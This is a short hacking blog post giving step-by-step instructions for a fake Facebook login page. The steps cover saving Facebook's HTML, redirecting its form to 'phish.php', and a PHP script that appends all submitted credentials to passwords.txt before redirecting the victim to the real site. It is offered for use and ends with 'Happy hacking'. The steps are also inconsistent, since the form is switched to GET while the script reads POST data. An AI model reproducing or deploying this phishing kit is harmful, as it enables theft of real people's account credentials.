Night Diamond Slide Glow HOW TO CREATE UR OWN FAKE FACEBOOK LOGIN PAGE INDEX AND PHP FILES ? | D43Mon

HOW TO CREATE UR OWN FAKE FACEBOOK LOGIN PAGE INDEX AND PHP FILES ?



https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQket5EF9EhI7IkMihXkswXOo6wN1Td_dC0yag06hh1-0viraxigw

To create index.html:
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.

To create phish.php:
Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Your Done Happy hacking ^_^


Responses

0 Respones to "HOW TO CREATE UR OWN FAKE FACEBOOK LOGIN PAGE INDEX AND PHP FILES ?"

Post a Comment

 
Return to top of page Copyright © 2013 | Design By (D43mon)